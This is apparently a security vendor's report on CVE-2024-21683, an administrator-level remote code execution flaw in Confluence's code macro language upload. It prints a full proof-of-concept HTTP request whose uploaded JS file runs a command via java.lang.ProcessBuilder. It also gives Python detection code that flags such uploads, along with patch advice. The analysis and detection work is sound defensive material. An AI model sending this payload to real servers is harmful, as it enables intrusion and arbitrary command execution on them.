Vulnerability report written by the TA team after analyzing "Atlassian Confluence Remote Code Execution (CVE-2024-21683)"
Atlassian Confluence Remote Code Execution
The vulnerability is an RCE vulnerability in Confluence Data Center and Server: a user with "Confluence Administrator" privileges can upload a malicious JS file through the "Add new language" feature in the General Configuration - Configure Code Macro settings, and the uploaded file is executed on the server, allowing arbitrary commands to run.
This vulnerability is resolved by applying the security update announced by Atlassian in March 2024, and our AIWAF product already detects the attack through existing related patterns.
1. Overview
Confluence is a team collaboration solution provided by Atlassian. This report analyzes CVE-2024-21683, a remote code execution vulnerability in that solution.
Source : https://www.helpnetsecurity.com/2024/06/03/cve-2024-21683-poc/
2. Attack types
The vulnerability is an RCE vulnerability in Confluence Data Center and Server that gained a lot of attention when exploit information for it was published on GitHub.
The "Add new language" feature in the General Configuration - Configure Code Macro settings lets an administrator upload a language definition file, and the upload is not restricted to legitimate definitions: a maliciously crafted JS file is accepted and executed on the server, as in the request below.
POST /admin/plugins/newcode/addlanguage.action HTTP/1.1
Host: 127.0.0.1:8090
Content-Length: 512
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8090
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvguW5DY0BuQ87x08
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8090/admin/plugins/newcode/save.action
Accept-Encoding: gzip, deflate, br
Accept-Language: ar,en-US;q=0.9,en;q=0.8
Cookie: [Your cookies ]
Connection: close
------WebKitFormBoundaryvguW5DY0BuQ87x08
Content-Disposition: form-data; name="atl_token"
[ atl_token ]
------WebKitFormBoundaryvguW5DY0BuQ87x08
Content-Disposition: form-data; name="languageFile"; filename="exploit.js"
Content-Type: text/javascript
new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()
------WebKitFormBoundaryvguW5DY0BuQ87x08
Content-Disposition: form-data; name="newLanguageName"
RCE
------WebKitFormBoundaryvguW5DY0BuQ87x08--
However, the vulnerability is relatively difficult to exploit because the settings page is only reachable with a "Confluence Administrator" account, which is a highly privileged account. Once an attacker has such an account, executing arbitrary commands is very easy.
3. What to do
Atlassian released a patch for this vulnerability in the March 2024 security update, so updating Confluence to the latest version protects against it.
Our AIWAF product already detects this attack with existing patterns: the 851: Apache Struts Framework Vulnerability pattern detects syntax such as java.lang., and the 724: Upload File Vulnerability (Script) pattern detects JS file uploads. We are still analyzing whether additional patterns for this attack syntax are needed.
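The following is an added illustration of the content-based detection idea described above, not AIWAF's pattern set and not code from the report. It parses a POST to the addlanguage.action endpoint shown in section 2, inspects only the languageFile part, and flags Java interop syntax such as java.lang. rather than the .js extension alone, since legitimate language definitions are also JS files. The indicator list, the host name and the benign brush file are assumptions constructed for this example.

```python
import re
from email.parser import BytesParser
from email.policy import default

# Path and upload field name are taken from the request shown in the report.
ADDLANGUAGE_PATH = "/admin/plugins/newcode/addlanguage.action"
UPLOAD_FIELD = "languageFile"
# Java interop constructs that a code-macro language definition never needs
# (assumed indicator set for this example, not AIWAF's actual pattern).
JAVA_INTEROP = re.compile(rb"java\.lang\.|Packages\.|ProcessBuilder|getRuntime\s*\(")

def inspect_request(raw: bytes) -> list:
    """Return '<filename>: <match>' for each languageFile part carrying Java interop."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode().split("\r\n")
    method, path = request_line.split(" ")[:2]
    if method != "POST" or path.split("?")[0] != ADDLANGUAGE_PATH:
        return []
    headers = dict(line.split(":", 1) for line in header_lines)
    ctype = headers.get("Content-Type", "").strip()
    # Re-use the stdlib MIME parser: prepend the Content-Type header to the body.
    msg = BytesParser(policy=default).parsebytes(f"Content-Type: {ctype}\r\n\r\n".encode() + body)
    findings = []
    for part in msg.iter_parts():
        if part.get_param("name", header="content-disposition") != UPLOAD_FIELD:
            continue
        hit = JAVA_INTEROP.search(part.get_payload(decode=True) or b"")
        if hit:
            findings.append(f"{part.get_filename()}: {hit.group().decode()}")
    return findings

def build_request(parts) -> bytes:
    """Constructed sample (not captured traffic) in the shape of the report's PoC."""
    b = "----ExampleBoundary"
    body = b""
    for name, filename, payload in parts:
        disp = f'form-data; name="{name}"' + (f'; filename="{filename}"' if filename else "")
        body += f"--{b}\r\nContent-Disposition: {disp}\r\n\r\n".encode() + payload + b"\r\n"
    body += f"--{b}--\r\n".encode()
    head = (f"POST {ADDLANGUAGE_PATH} HTTP/1.1\r\nHost: confluence.example\r\n"
            f"Content-Type: multipart/form-data; boundary={b}\r\nContent-Length: {len(body)}")
    return head.encode() + b"\r\n\r\n" + body

# Payload line as printed in the report, beside a stand-in benign brush file (constructed).
MALICIOUS = build_request([("atl_token", None, b"TOKEN"), ("newLanguageName", None, b"RCE"),
    ("languageFile", "exploit.js",
     b'new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()')])
BENIGN = build_request([("atl_token", None, b"TOKEN"), ("newLanguageName", None, b"Example"),
    ("languageFile", "shBrushExample.js", b"SyntaxHighlighter.brushes.Example = function() {};")])
```

inspect_request(MALICIOUS) reports the exploit.js upload with the matched java.lang. token, while the benign upload and non-POST requests to the same path produce no findings.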
4. Conclusion
The RCE attack in Atlassian Confluence is limited by the fact that it requires an account with a certain level of privileges, but with such an account it is a simple and easy vulnerability to exploit. Since many organizations use the solution, the impact is high enough that you should update to the latest version as soon as possible.
Our AIWAF product has developed patterns for vulnerabilities in Atlassian Confluence, and we will continue to respond quickly to related vulnerabilities as they are discovered.